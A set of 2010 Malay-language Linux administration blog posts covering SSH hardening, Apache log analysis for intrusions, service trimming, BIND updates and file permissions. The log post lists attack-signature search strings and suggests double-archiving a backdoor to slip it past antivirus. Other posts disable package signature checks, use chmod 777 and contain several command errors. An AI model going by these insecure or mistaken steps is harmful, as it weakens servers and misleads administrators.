Is this ok [y/N]:
---------------------------

* jangan taip Y+enter tapi taip N+enter atau enter sahaja

2) Servis yang biasa guna untuk web server bagi jalankan PHP Application hanyalah httpd dan php sahaja.
Selain tu adalah hanya option.
- mod_security adalah mod utk buat filtering dari vulnerable // jika tak properly configure baik takyah guna kerana ianya akan menyebabkan pengguna slow akses kepada sistem
- mod_perl adalah mod jika ada guna coding perl
- mod_python adalah mod jika ada guna coding python
- mod_ssl adalah mod jika ada guna https application. kalau takat portal je takyah le. Jika nak guna nanti install semula
- httpd-manual adalah manual untuk konfigurasi httpd, tapi kita jarang sekali tengok, baik buang je
- webalizer adalah software utk create statsitik public akses kepada web server, jika keperluan ada gunakanlah sebaiknya. jika tidak keluarkan sahaja.

3) Buangkan software
# yum remove mod_ssl mod_perl mod_python httpd-manual webalizer

4) Taip yes dan tunggu sehingga selesai

5) Done!

Semoga berjaya
~ Be a Creator Not a User ~

Lots Of Tips to Maintain Linux Server

2010-10-12T18:31:00.007+08:00

Lagi nota kursus di INTANBK. Aku tak reti nak letak tajuk apa sebenarnya. Tapi nak citer kaedah nak semak version software dlm server dan monitor aktiviti sedang dijalankan server dan configure server firewall, network, services guna GUI Command Line...

OS : CentOS / RHEL
-----------------------------------------------------------
Kaedah untuk semak version software di server :
-----------------------------------------------------------
# rpm -qa | grep mysql
# rpm -qa | grep php
# rpm -qa | grep kernel
# rpm -qa | grep ssh
# rpm -qa | grep http
cth result :
httpd-manual-2.2.16-jason.1
jakarta-commons-httpclient-3.0-7jpp.1
httpd-2.2.16-jason.1

----------------------------------------------------------------------------------
Kaedah untuk semak aktiviti atau port yang digunakan di server :
----------------------------------------------------------------------------------

# netstat -nat // display svr run port apa
# netstat -natup // display svr run port apa dan keterangan nama port
# netstat -natup | more // untuk pause display sekiranya panjang senarainya

----------------------------------------------------------------------------------
Kaedah untuk buat konfigurasi pada server guna GUI CMDLine :
----------------------------------------------------------------------------------
# setup
Seterusnya ikut menu di dalamnya. Boleh edit services run di server, boleh edit config firewall, boleh edit network configuration, boleh edit timezone, boleh edit firewall configuration

----------------------------------------------------------------------------------
Kaedah untuk semak versi kernel server
----------------------------------------------------------------------------------
# uname -a

----------------------------------------------------------------------------------
Kaedah untuk update software patch
----------------------------------------------------------------------------------
# yum update

----------------------------------------------------------------------------------
Kaedah untuk buang x windows system
----------------------------------------------------------------------------------
# yum groupremove 'X Window System'

---------------------------------------------------------------------------------------
Kaedah untuk buka page baru apabil gunakan command line page dalam linux
---------------------------------------------------------------------------------------
Klik Alt + F2

* Untuk change page sebelumnya, kli F1
* sebanyak 8 page boleh dibuka serentak iaitu dari F1 - F8

---------------------------------------------------------------------------------------
Kaedah untuk kemaskini, tambah, delete crontab
---------------------------------------------------------------------------------------
# crontab -e //untuk edit file crontab (tambah / delete / edit)
# crontab -l //senaraikan cron yang telah dibuat konfigurasi

Apabila kita edit fail crontab, fail akan disimpan di /var/spool/cron

---------------------------------------------------------------------------------------
Tengok polisi IPTables
---------------------------------------------------------------------------------------
# iptables -save

---------------------------------------------------------------------------------------
Senarai servis yang tidak diperlukan dalam real live server
---------------------------------------------------------------------------------------
OS : CentOS / RHEL
- servis berikut by default di enablekan, tapi kita boleh disablekannya untuk kurangkan load servis tak perlu di server
- servis-servis lain ada yang by default telah disable

1) apmd - apmd is used for monitoring battery status and logging it via syslog(8). It can also be used for shutting down the machine when the battery is low

2) atd - Runs commands scheduled by the at command at the time specified when at was run, and runs batch commands when the load average is low enough.

3) avahi - // semua berkaitan
- This is a daemon which runs on client machines to perform Zeroconf service discovery on a network. avahi-daemon must be running on systems that use Avahi for service discovery. Avahi-daemon should not be running otherwise

4) bluetooth - Bluetooth services for service discovery, authentication, Human Interface Devices, etc.

5) cups - Startup/shutdown script for the Common UNIX Printing System (CUPS).

6) firstboot - Firstboot is a druid style program that runs on the first time a machine is booted after install. It checks for the existence of an /etc/sysconfig/firstboot file. If it doesn't find the file, then the firstboot program needs to run. If it finds the file, firstboot will not be run.

7) gpm - GPM adds mouse support to text-based Linux applications such as the Midnight Commander. It also allows mouse-based console cut-and-paste operations, and includes support for pop-up menus on the console.

8) hidd - Bluetooth Human Interface Device Daemon. Provides keyboard, mouse etc. functionality over Bluetooth.

9) isdn - ISDN Modem driver

10) * kudzu - Bluetooth Human Interface Device Daemon. Provides keyboard, mouse etc. functionality over Bluetooth.

11) * lvm2 - Starts and stops dmeventd monitoring for lvm2. Jika ada buat Software RAID di OS.

12) mcstrans - his starts the SELinux Context Translation System Daemon

13) mdmonitor - software RAID monitoring and management

14) pcsd - The PC/SC smart card daemon is a resource manager for the PC/SC lite and Musclecard frameworks. It coordinates communications with smart card readers, smart cards, and cryptographic tokens that are connected to the system.

15) readahead // semua berkaitan
- This service causes the programs used during startup to be loaded into memory before they are needed, thus improving startup performance

16) restorecond // jika guna SELinux perlu guna
- restorecond uses inotify to look for creation of new files listed in the /etc/selinux/restorecond.conf file, and restores the correct security context.

17) rpc // semua berkaitan
- Starts user-level daemon that manages RPCSEC GSS contexts for the NFSv4 client.
- Starts user-level daemon for NFSv4 that maps user names to UID and GID numbers.
- Starts user-level daemon that manages RPCSEC GSS contexts for the NFSv4 server

18) * sendmail - Sendmail is a Mail Transport Agent, which is the program that moves mail from one machine to another.

19) setroubleshoot - This starts the SELinux Troubleshooting Daemon

20) *yum-updatesd // jika guna alert new patch better on kan
- This is a daemon which periodically checks for updates and can send notifications via mail, dbus or syslog.

* Jika diperlukan enablekan ia, kerana fungsi server adalah berbeza dan bergantung kepada aplikasi di dalamnya.

---------------------------------------------------------------------------------------
Move,create and remove file in linux
---------------------------------------------------------------------------------------
# mv (filename) (new location) //move a file to another location
# cat (filename) //create a new file
# nano (filename) //create a new file
# rm (filename) //delete a file
# rm -r (directory) // remove a director + semua didalamnya
# rmdir (mydir) // remove a directory
* tambahan selepas command tersebut
-f > force
-r > recursive

---------------------------------------------------------------------------------------
check last users login :

# last
# last | more //to pause view

---------------------------------------------------------------------------------------
Tambah user baru :

# useradd mohd
# passwd mohd

---------------------------------------------------------------------------------------
Kenalpasti sesuatu domain dari ip mana :

# dig google.com. -t a

---------------------------------------------------------------------------------------
Kenalpasti aktiviti di dalam server :

# ps -aef | more

---------------------------------------------------------------------------------------
Kenalpasti info folder dan fail berkenaan :

# cat /etc/group
# cat /etc/passwd

---------------------------------------------------------------------------------------
Semoga berjaya!

~ Be a Creator Not a User ~

Configure a Secured SSH

2010-10-12T18:17:00.002+08:00

Kali ni aku nak share kaedah yang aku belajar utk setup SSH agar lebih selamat. Aku dapat ilmu ni dari Kursus Keselamatan ICT di INTANBK.

Bagi pengguna tegar Linux pasti biasa dengan linux ssh dan putty untuk buat kerja maintenance ke server linux masing-masing. Ada juga sesetengahnya terlalu open benarkan ssh akses by public ke server tersebut. Ini tindakan bahaya dan makan diri sebenarnya.

Lokasi Fail Konfigurasi SSH

/etc/ssh/sshd_config – Fail Konfigurasi OpenSSH server
/etc/ssh/ssh_config – Fail Konfigurasi OpenSSH client
~/.ssh/ - Direktori Konfigurasi Pengguna SSH
~/.ssh/authorized_keys atau ~/.ssh/authorized_keys – Senarai Public Keys (RSA or DSA) yang boleh digunakan untuk login
/etc/nologin – Sekiranya fail ini ada, OpenSSH server menghalang sebarang login kepada server selain pengguna root sahaja
/etc/hosts.allow dan /etc/hosts.deny - Access controls lists yang dijanakan oleh tcp-wrappers ditetapkan disini.
SSH port asal : TCP 22

Konfigurasi OpenSSH Server Yang Selamat

Sekiranya server tidak menggunakan komunikasi menerusi OpenSSH, buangkan ia dari server
# chkconfig sshd off
# yum erase openssh-server
Buka fail sshd_config
# nano /etc/ssh/sshd_config
Gunakan hanya SSH Protocol Versi 2 sahaja. Protocol versi 1 terdedah kepada serangan Man-In-Middle Attack. Laksana konfigurasi berikut :
```
Protocol 2
```

Benarkan capaian menerusi SSH hanya kepada pengguna tertentu yang dilantik sahaja.

AllowUsers root muzzo haris
Anda boleh halang capaian menerusi SSH kepada pengguna tertentu.
DenyUsers  amran asiah

Pengguna dibenarkan akses menerusi SSH dan ditetapkan selang masa idle yang dibenarkan untuk mengelakkan session ssh yang tak sah.
ClientAliveInterval 300
ClientAliveCountMax 0
Anda menetapkan masa idle dalam saat (300 saat = 5 minit). Selepas masa ini, pengguna yang idle dan secara automatik keluar dari sistem.

Jangan benarkan SSH membaca fail user's ~/.rhosts dan ~/.shosts. Ini kerana SSH boleh menyebabkan command rsh terganggu dan terdedah kepada bahaya. Akses melalui RSH amat berbahaya.
IgnoreRhosts yes
Seterusnya halang login menggunakan host.
HostbasedAuthentication no
Tindakan untuk terus login menggunakan root melalui ssh menerusi rangkaian adalah amat berbahaya. Ini kerana pengguna biasa boleh mendapat akses sebagai root dengan menggunakan su atau sudo. Dengan cara ini, kita akan dapat maklumat terperinci tentang siapa yang telah menjalankan command khas tertentu pada sistem tersebut melalui sudo.
PermitRootLogin no
Tetapkan banner amaran :
Banner /etc/issue
Ubah fail Banner Standard /etc/issue kepada berikut :

Anda telah mencapai Sistem Komunikasi Server Linux Application yang dikhususkan untuk Pegawai Teknikal yang berdaftar sahaja. Dengan menggunakan capaian ini, anda tertakluk kepada perkara berikut :

+ Anda tertakluk dibawah Dasar Keselamatan ICT Negeri Pahang

+ Capaian dan aktiviti anda pada server ini dipantau sepanjang masa

+ Capaian kepada server ini adalah menggunakan kawalan keselamatan yang ketat bagi menjamin keselamatan server serta data di dalamnya

+ Sebarang kerosakan disebabkan oleh komunikasi menggunakan Sistem Komunikasi di server ini tidak akan dipertanggungjawabkan kepada admin server ini

Anda dengan ini bersetuju untuk menggunakan Sistem Komunkasi ini dan mematuhi peraturan yang telah ditetapkan.

Anda perlu tetapkan had akses kepada port # 22 di firewall server. Gunakan Shorewall sebagai firewall server dan tetapkan Firewall Rules berikut :
ACCEPT net:10.254.31.0/24 $FW tcp 22 //wajib ada
ACCEPT net:10.253.31.0/24 $FW tcp 22 //wajib ada
ACCEPT net:10.30.31.0/24 $FW tcp 22 //wajib ada
ACCEPT net:10.254.yy.0/24 $FW tcp 22 //pilihan mengikut lokasi
ACCEPT net:10.xx.yy.0/24 $FW tcp 22 //pilihan mengikut lokasi
xx = subnet jabatan, yy = subnet daerah
Tetapkan kata laluan pengguna SSH yang kukuh dan mengandungi gabungan alphanumeric.
Jangan benarkan remote login daripada akaun pengguna yang tiada kata laluan :
PermitEmptyPasswords no

Gunakan DenyHosts untuk menetapakan konfigurasi kawalan akses SSH yang lebih spesifik. Untuk instalasi DenyHosts :

# rpm -Uhv http://apt.sw.be/packages/rpmforge-release/rpmforge-release-0.3.6-1.el5.rf.i386.rpm

# yum -y install denyhosts

# nano /etc/hosts.allow → Masukkan baris berikut : 'sshd: 192.168.2.0/255.255.255.0 192.168.1.1'

*Masukkan senarai IP Individu/Network IP yang dibenarkan akses menerusi SSH ke server tersebut sahaja.

# nano /etc/denyhosts.conf

############ THESE SETTINGS ARE REQUIRED ############

SECURE_LOG = /var/log/secure

HOSTS_DENY = /etc/hosts.deny

PURGE_DENY = 7d

BLOCK_SERVICE = sshd

DENY_THRESHOLD_INVALID = 5

DENY_THRESHOLD_VALID = 10

DENY_THRESHOLD_ROOT = 1

DENY_THRESHOLD_RESTRICTED = 1

WORK_DIR = /usr/share/denyhosts/data

SUSPICIOUS_LOGIN_REPORT_ALLOWED_HOSTS=YES

HOSTNAME_LOOKUP=YES

LOCK_FILE = /var/lock/subsys/denyhosts

############ THESE SETTINGS ARE OPTIONAL ############

ADMIN_EMAIL = adminsvr@pahang.gov.my

SMTP_HOST = localhost

SMTP_PORT = 25

SMTP_FROM = DenyHosts

SMTP_SUBJECT = DenyHosts Report

AGE_RESET_VALID=5d

AGE_RESET_ROOT=30d

AGE_RESET_RESTRICTED=30d

AGE_RESET_INVALID=10d

######### THESE SETTINGS ARE SPECIFIC TO DAEMON MODE ##########

DAEMON_LOG = /var/log/denyhosts

DAEMON_SLEEP = 30s

DAEMON_PURGE = 1h

######### THESE SETTINGS ARE SPECIFIC TO ##########

######### DAEMON SYNCHRONIZATION ##########

Konfigurasi denyhosts daemon run apabila server start

# chkconfig denyhosts on

Start daemon denyhosts

# service denyhosts start

Pantau fail log denyhosts

# tail -f /var/log/denyhosts

# tail -f /var/log/secure

Pastikan LogLevel ditetapkan kepada INFO atau DEBUG
LogLevel INFO

Tetapkan pecahan privilege
UsePrivilegeSeparation yes
Halang sebarang cubaan menggunakan kebenaran akses kepada home directory dan fail kunci
StrictModes yes
Tetapkan semakan ReverseMapping
VerifyReverseMapping yes
Tetapkan TCP Forwarding
AllowTcpForwarding no
X11Forwarding no
Pastikan OpenSSH sentiasa dikemaskini dengan versi terkini
# yum update openssh-server
Menetapkan masa idle akses menerusi ssh dilimitkan. Ini bertujuan bagi mengelakkan kemungkinan orang sekeliling yang membuat sesuatu menggunakan pengguna yg akses menerusi ssh apabila pengguna sebenar tiada di meja.
LoginGraceTime 2m
Menetapkan polisi jumlah cubaan yang dibenarkan sebelum di halang akses menerusi ssh pada server. Ini bagi mengelakkan sebarang cubaan brute force menerusi ssh.
MaxAuthTries 5

* Tukar port default ssh dari 22 kepada port lain yang tidak digunakan servis lain dan mudah nak ingat.Ini bertujuan memastikan port biasa digunakan sukar diketahui hackerz untuk menyerang menggunakan port ssh tersebut.
Tukar :
#Port 22
Kepada :
Port 775 (contoh)

Semoga berjaya

~ Be a Creator Not a User ~

I can't upload big size in PHP Application

2010-10-08T09:31:00.000+08:00

Just short shares info, terlintas di fikiran...ehehe

Sekiranya kita ada bangunkan satu sistem aplikasi PHP yang mengandungi fungsi upload fail ke satu direktori di server atau gunakan kaedah upload dan simpan di DB MySQL. So kita nak enablekan boleh upload sehingga limit kepada 200MB saiz fail. Ini kerana sistem ni hanya guna INTRANET sahaja. So confirm laju.

By default konfigurasi php.ini adalah membenarkan upload fail sebesar 8MB sahaja. Untuk membolehkan upload data yang besar, kita perlu ubah fail php.ini.

OS : CentOs / RHEL
PHP : 5.3.x

1) Edit fail php.ini di /etc/php.ini

Cari 'memory_limit' dan tukarkan kepada 220MB # lebihkan jumlah sepatutnya
Cari 'upload_max_filesize' dab tukarkan kepada 220MB # lebihkan jumlah sepatutnya
Cari 'post_max_size' dab tukarkan kepada 220MB # lebihkan jumlah sepatutnya
2) Save dan exit
3) Seterusnya restart httpd. /etc/init.d/httpd restart

Untuk upload ke MySQL pula :
1) Edit fail my.cnf. /etc/my.cnf
Cari 'max_allowed_packet' dan tukarkan kepada 220MB
Sekiranya tiada, tambahkannya di dalam fail tersebut.
2) Save dan exit
3) Seterusnya restart mysqld. /etc/init.d/mysqld restart

Semoga berjaya !!!

~ Be a Creator Not a User ~

How to analyze log file to find hackerz activities

2010-10-07T17:09:00.001+08:00

Pada masa kini kejadian web defacement atau kehilangan data melalui sistem aplikasi online sebenarnya sering berlaku. Sama ada ianya diketahui umum (hebahan menerusi website zone-H) ataupun dirahsiakan atas sebab keselamatan. Ianya berlaku bukanlah disebabkan hackerz yang terlebih pandai tapi akibat kelemahan kawalan dan pemantauan oleh admin sistem aplikasi tersebut.

Salah satu kaedah untuk pemantauan ini adalah menerusi semakan pada log fail web server.

Pada asasnya apabila kita setup web server apache, access.log akan sedia ada terbina dan disimpan di /var/log/httpd/

OS : CentOS / RHEL
Web Server : Apache

Namun sekiranya web server kita merupakan hosting kepada banyak vhost maka ianya akan memeritkan lagi kerja server admin bagi membuat analisa kepada fail log sekiranya berlaku sebarang web defacement atau data hilang menerusi salah satu vhost di server tersebut.

Kelebihan 1 log file untuk semua vhost :
1) Mudah untuk penyimpanan atau backup data kerana ianya disimpan setempat
2) Memudahkan carian sebarang maklumat dari log fail kerana disimpan setempat

Kelemahan 1 log file untuk semua vhost :
1) Menyusahkan kerja admin untuk analisa log file
2) Default log rotate adalah 4 file, bagi file ke 5 akan di delete rotate file terakhir dan juga terdapat limit saiz bagi setiap fail log. Ini mengakibatkan kemungkinan data untuk dianalisa telah hilang sekiranya rotate fail telah dipadamkan akibat log file server menyimpan vhost yang banyak.
3) Sekiranya fail tersebut di delete, maka semua fail log vhost lain turut sama di delete

Kaedah untuk create unik log file bagi setiap vhost dilaksanakan di fail vhost di setiap web server dengan menggunakan script berikut :
fail : /etc/httpd/conf/httpd.conf
Tambah row ErrorLog dan CusomLog
-------------------------------------

    ServerAdmin admin@server.com
    DocumentRoot /var/www/html/finance
    ServerName finance.org
    ErrorLog logs/finance-error_log
    CustomLog logs/finance-access_log common
-------------------------------------

Namun bagi kes hanya 1 access.log file sahaja. Boleh gunakan kaedah berikut :

1) Kenalpasti tarikh insiden hackerz buat web defacement berlaku

2) Run command berikut :
# grep "03/Sep/2010" /var/log/httpd/access.log > hack0309.txt
- filter row yang memaparkan tarikh 3 September 2010 dan simpan di fail hack0309.txt

3) Sekiranya ada spesifik masa insiden berlaku maka run command berikut :
# grep "03/Sep/2010:13:2" /hack0309.txt > hack0309-120PTG.txt
- filter row yang memaparkan tarikh 3 September 2010 dan pada jam 1 :20 ptg hingga 1:29 ptg dan simpan di fail hack0309-120PTG.txt

Maka anda perlu analisa dari log tersebut sebarang kod status 200 (berjaya akses) dan kenalpasti sebarang aktiviti mencurigakan seperti POST atau GET dari log file tersebut kepada folder tertentu yang dikenalpasti tempat hackerz membuat web defacement.

Kadangkala hackerz ada memasukkan fail backdoor script ke dalam server dan sekiranya kita cuba untuk download ke pc kita yang ada antivirus confirm akan detect sebagai trojan.backdoor (SEP11).

Oleh itu, laksana command berikut :

1) # gzip index.php
- gzip fail tersebut

2) # tar -cvf index.tar /var/www/www_kuarantin/saspekQ/1msia1phg/images/index.php.gz
- zipkan kali kedua dengan tar fail gzip tadi. Kebiasaannya antivirus jarang detect fail in depth zip dengan lebih dari 1 lapisan zip.

3) Transfer fail ke PC anda dan tiada lagi antivirus detect fail tersebut lalu delete atau kuarantinkannya.

Untuk kenalpasti jenis serangan :
Baca file log dari pc Windows
1) File Inclusion
# findstr /c:"=http" (nama file) > (output file)

2) Directory Traversal
# findstr /c:"../" (nama fail) > (output file)

3) SQL Injection
# findstr /c:"UNION" (nama fail) > (output file)

4) XSS
# findstr /c:"(script)" (nama fail) > (output file)

Search : ganti '(' dengan '<' dan ')' dengan '>'

/c = search string

Semoga berjaya!!!
~ Be a Creator Not a User ~

How to delete a row of words in a file using command line

2010-10-07T14:18:00.000+08:00

Seronoknya dapat menaip artikel semula..
Aku nak terangkan kaedah untuk kita cari dan delete row dalam fail menggunakan command line.
Aku gunakan ni pada server proxy aku yang guna dansguardian. So dalam tu ada banyak senarai site blacklist berdasarkan kategori. Sesetengah domain di masukkan dalam pelbagai kategori. So aku kena cari kaedah nak cari dari pelbagai fail dan padam nama domain tu padanya.

OS : CentOS / RHEL
Svr Function : Proxy + Dansguardian
BlackList : BigBlacklist

SEARCH AND DELETE A ROW :

Berikut aturan untuk melaksanakannya :
(Sekiranya guna selain bigblacklist, tukar sahaja path tersebut)

1) # grep -R 'facebook.com' /etc/dansguardian/bigblacklists/ > fb.txt
- filter semua file dalam dir bigblacklists dan simpan dalam fail fb.txt

2) # more fb.txt
- baca fail fb.txt untuk kenalpasti path untuk fail yang ada word 'facebook.com'

3) # mv /etc/dansguardian/bigblacklists/chat/domains /etc/dansguardian/bigblacklists/chat/domainsold
- rename nama fail asal kpd nama lain

4) # sed '/facebook.com/d' /etc/dansguardian/bigblacklists/chat/domainsold > /etc/dansguardian/bigblacklists/chat/domains
- delete row mengandungi 'facebook.com' dan simpan ke dalam fail nama asal

SEARCH AND REPLACE WORDS :

Sekiranya aku nak cari dan replace dengan wording tertentu.. macam search and replace function dalam kebanyakan perisian atau windows. Tapi ni guna command line.

Berikut aturan untuk melaksanakannya :
(Sekiranya guna selain bigblacklist, tukar sahaja path tersebut)

1) # grep -R 'facebook.com' /etc/dansguardian/bigblacklists/ > fbchg.txt
- filter semua file dalam dir bigblacklists dan simpan dalam fail fbchg.txt

2) # more fbchg.txt
- baca fail fbchg.txt untuk kenalpasti path untuk fail yang ada word 'facebook.com'

3) # mv /etc/dansguardian/bigblacklists/chat/domains /etc/dansguardian/bigblacklists/chat/domainsold
- rename nama fail asal kpd nama lain

4) # sed 's/facebook.com/pahang2.my/g' /etc/dansguardian/bigblacklists/chat/domainsold > /etc/dansguardian/bigblacklists/chat/domains
- search nama words dan replace dengan words yang diinginkan dan simpan ke dalam fail nama asal

Semoga berjaya...banyak lagi tips aku KIV ni...ergh..to much work make me unwell for a while..alhamdulillah i'm recover..

~ Be a Creator Not a User ~

How to Update Bind from RPM

2010-09-14T11:38:00.001+08:00

Kali ni aku nak citer macamana nak update BIND dari versi 9.5.2-P3 kepada versi 9.5.2-P4. Kalau ikutkan memang agak kebelakang skit versi tu berbanding versi terbaru 9.7.x dah skang ni. Tapi ni sebab aku baru tau cara nak update patch tu sebab BIND memang sering jadi sasaran kepada pelbagai serangan dan terbaru DNS Poisoning. So be prepare. Versi 9.5 ke atas memang ada fungsi tu dah.

Sebelum kita update make sure buat backup dulu kat semua folder dan fail-fail utama server BIND tu kang apa2 berlaku leh revert semula..

Fail utk backup :
1) /var/lib/named/ (domain zone here)
2) /etc/named/ (all configuration file here)
3) /etc/sysconfig/named (detail configuration file - optional if only changed)
4) /etc/rc.d/init.d/named (bind program - optional if only changed)
~~5) /usr/sbin/named~~
~~6) /usr/sbin/named-checkconf~~
7) /var/log/named/ (all log file on bind - optional to restore but needed to analyze)
8) /var/run/named/ (store the named.pid file - optional)

* berakhir dengan / bermaksud folder, jika tidak bermaksud file

So semua fail tu dah buat backup. Sekarang kita download RPM dari RPM Pbone.net

1) Buka putty dan login ke server DNS anda sebagai root

2) cd /opt (aku suke kita nak download apa2 guna folder /opt)

3) Download file RPM berkaitan :
> wget ftp://ftp.pbone.net/mirror/ftp.pramberger.at/systems/linux/contrib/rhel5/i386/bind-9.5.2-1.P4.el5.pp.i386.rpm

> wget ftp://ftp.pbone.net/mirror/ftp.pramberger.at/systems/linux/contrib/rhel5/i386/bind-utils-9.5.2-1.P4.el5.pp.i386.rpm
(Dependency files)
> wget ftp://ftp.pbone.net/mirror/ftp.pramberger.at/systems/linux/contrib/rhel5/x86_64/bind-libs-9.5.2-1.P4.el5.pp.i386.rpm
(Dependency files)

4) nano /etc/yum.conf
Tukar kepada :
gpgcheck=0
seterusnya save, tekan ctrl+x dan taip 'y' seterusnya enter
# Tujuannya adalah untuk elak dari keluar error mesej berikut :
Public key for bind-libs-9.5.2-1.P4.el5.pp.i386.rpm is not installed
# Nanti dah setel enablekan semula gpgcheck tu sebab ia penting agar kita dapat key sumber yang sah dan sebenarnya..

5) Stop BIND
> /etc/init.d/named stop

Kemudian run yum
> yum update bind*

6) Biarkan sampai keluar mesej berikut :
Setting up Update Process
Examining bind-9.5.2-1.P4.el5.pp.i386.rpm: 30:bind-9.5.2-1.P4.el5.pp.i386
Marking bind-9.5.2-1.P4.el5.pp.i386.rpm as an update to 30:bind-9.5.2-1.P3.el5.pp.i386
Examining bind-libs-9.5.2-1.P4.el5.pp.i386.rpm: 30:bind-libs-9.5.2-1.P4.el5.pp.i386
Marking bind-libs-9.5.2-1.P4.el5.pp.i386.rpm as an update to 30:bind-libs-9.5.2-1.P3.el5.pp.i386
Examining bind-utils-9.5.2-1.P4.el5.pp.i386.rpm: 30:bind-utils-9.5.2-1.P4.el5.pp.i386
Marking bind-utils-9.5.2-1.P4.el5.pp.i386.rpm as an update to 30:bind-utils-9.5.2-1.P3.el5.pp.i386
Resolving Dependencies
Skipping security plugin, no data
--> Running transaction check
---> Package bind-utils.i386 30:9.5.2-1.P4.el5.pp set to be updated
---> Package bind.i386 30:9.5.2-1.P4.el5.pp set to be updated
---> Package bind-libs.i386 30:9.5.2-1.P4.el5.pp set to be updated
--> Finished Dependency Resolution

Dependencies Resolved

==========================================================================
Package   Arch Version              Repository                             Size
==========================================================================
Updating:
bind      i386 30:9.5.2-1.P4.el5.pp bind-9.5.2-1.P4.el5.pp.i386.rpm       327 k
bind-libs i386 30:9.5.2-1.P4.el5.pp bind-libs-9.5.2-1.P4.el5.pp.i386.rpm 1.2 M
bind-utils
           i386 30:9.5.2-1.P4.el5.pp bind-utils-9.5.2-1.P4.el5.pp.i386.rpm 245 k

Transaction Summary
==========================================================================
Install      0 Package(s)
Update       3 Package(s)
Remove       0 Package(s)

Total download size: 1.7 M
Is this ok [y/N]: y
Downloading Packages:
Running rpm_check_debug
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Updating       : bind-libs                                         [1/6]
Updating       : bind-utils                                        [2/6]
Updating       : bind                                              [3/6]
Cleanup        : bind-libs                                         [4/6]
Cleanup        : bind                                              [5/6]
Cleanup        : bind-utils                                        [6/6]

Updated: bind.i386 30:9.5.2-1.P4.el5.pp bind-libs.i386 30:9.5.2-1.P4.el5.pp bind-utils.i386 30:9.5.2-1.P4.el5.pp
Complete!

7) Tahniah anda berjaya. Semak folder yang dibackup tadi sama ada sebarang perubahan telah dibuat pada config asal. Aku test kat server aku ia tak merubah fail config asal. Kini start semula BIND
> /etc/init.d/named start

Semoga berjaya!

~ Be a Creator Not a User ~

How to change view in JoomlaXplorer to only its own folder only

2010-09-06T11:22:00.000+08:00

JoomlaXplorer ni merupakan salah satu komponen yang paling popular dalam Joomla pada masa kini dan menjadi kegusaran kepada admin host server yang handle multiple site within a single server.

So cara pada defaultnya, joomlaXplorer akan paparkan senarai folder dan file dari web root. Ini membolehkan mereka melihat dan mengubah file di dalam folder site orang lain. So amat berbahaya ni!!!

JoomlaXplorer ini cukup menyenangkan sebab ianya boleh tukar permission file dan folder tanpa melibatkan perlu login sebagai root user pun.

Kali ni aku cuma nak tunjukkan cara untuk tukar view default kepada web root tersebut kepada folder site tersebut sahaja.

1) Komenkan pada line 83 di dalam file

administrator/components/com_joomlaxplorer/admin.joomlaxplorer.php

2) Ubah file :

{site root directory}/administrator/components/com_joomlaxplorer/.config/conf.php

dari :

else {
$GLOBALS["home_dir"] = $dir_above;
// the url corresponding with the home directory: (no trailing ‘/’)
$GLOBALS["home_url"] = substr( $mosConfig_live_site, 0, strrpos($mosConfig_live_site, ‘/’));
}

kepada…

else {
$GLOBALS["home_dir"] = $mosConfig_absolute_path;
// the url corresponding with the home directory: (no trailing ‘/’)
$GLOBALS["home_url"] = $mosConfig_live_site;
}

3) Seterusnya cuba uji komponen joomlaXplorer tersebut dan insyaallah anda akan dapat lihat site anda sahaja.

- Namun masalah admin boleh permission file/folder mengikut kesukaan masing-masing ini sahaja cukup memeningkan admin server host tersebut.

- Kaedah untuk halang tu aku rasa ada, tapi belum jumpa true solution lagi.

- Kaedah yang aku terfikir adalah untuk create user sama group dengan apache dan mengikut site masing-masing dengan privilleges yang terhad dan tidak boleh menukar permission file/folder. Idea tu ada, tapi tk pasti la boleh guna atau tak.

- Bagi server hosting, kaedah awal tadi dah mencukupi. Jika berlaku kejadian hack disebabkan permission file/folder di tetapkan kepada 777 maka owner site kena bertanggungjawab sendiri le..

- Cuma bagi admin server host yang memang menjaga dan memastikan server dan site host di dalamnya selamat, kenalah fikirkan kaedah manipulate user server tu.

~ Be a Creator Not a User ~

http://muzzotechspot.blogspot.com

http://muzzoshah.blogspot.com

How to change file/folder owner and permission in Linux

2010-09-06T11:00:00.002+08:00

Aku rasa cukup lama sangat dah ni aku dah kongsi ilmu aku belajar dari internet dan rakan-rakan. Maaf, banyak ilmu diperolehi tapi tak kesempatan agak sibuk dengan tugasan semasa dan nak kejar SKT tahun ni..Aku akan cuba masukkan slowly...

Ok, skang aku nak citer cara kita nak tukar file permission menggunakan command dalam linux

OS : CentOS 5.x / RHEL 5.3

1) Buka command shell dan taip
# ls -l
// untuk tujuan menyenaraikan fail dan folder yang ada serta owner, group dan permission bagi setiap folder dan fail tersebut.

2) Sekarang kita buat tukar permission file dulu :
Untuk tukar permission single file :
# chmod 0777 (nama file bersama path)

Untuk tukar permission semua file dalam folder :
# chmod -R 0777 (nama folder dan path)

Untuk tukar permission kepada selected file yang permission 777 kepada 755 berdasarkan permission :
# find (nama file dan path) -perm 777 -print -exec chmod 755 {} \;
//kaedah ni menggunakan cara cari dulu file berkenaan dan seterusnya gunakan -exec untuk laksanakan chmod

Untuk tukar permission kepada folder di dalam path tersebut sahaja :
# find (nama folder dan path) -type d -exec chmod 755 {} \;

3) So kalau untuk ubah owner dan group pula, boleh gunakan kaedah command chown gantikan dari chmod dan seterunya buat pertukaran pada value permission kepada nama owner dan nama groups sahaja. Contoh seperti di bawah :
# chown-R (nama owner).(nama group)
# find (nama folder dan path) -type d -exec chown (nama owner).(nama group) {} \;

Harap boleh mencuba...dan raikan kejayaannya..

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

yum install webmin error : warning: rpmts_HdrFromFdno: Header V3 DSA signature: NOKEY

2010-07-19T17:41:00.000+08:00

Mesti kadangkala korang tetiba dapat error lebih kurang macam ni bila install webmin dari repo yang diberikan oleh site webmin.

warning: rpmts_HdrFromFdno: Header V3 DSA signature: NOKEY webmin...

So, cara nak solve :

1) buka putty dan login ke server

2) Taip : >rpm --import http://www.webmin.com/jcameron-key.asc

3) seterusnya : >yum install webmin

4) Tapi kalau step 2 tu kekadang dia hanging je...guna cara seterusnya.

5) taip : >cd /opt (change folder ke /opt)

6) >wget http://www.webmin.com/jcameron-key.asc

7) >rpm --import /opt/jcameron-key.asc

8) >yum install webmin

9) Done...

Selamat berjaya!

~ Be a Creator Not a User ~

http://muzzotechspot.blogspot.com

http://muzzoshah.blogspot.com

How to update new patch or package in Linux

2010-07-13T13:01:00.001+08:00

Ini nota simpanan aku gak sebenarnya sebab nak buat SOP pasal ni.
OS : RHEL, CentOS
Apps : WEBMI, sendmail
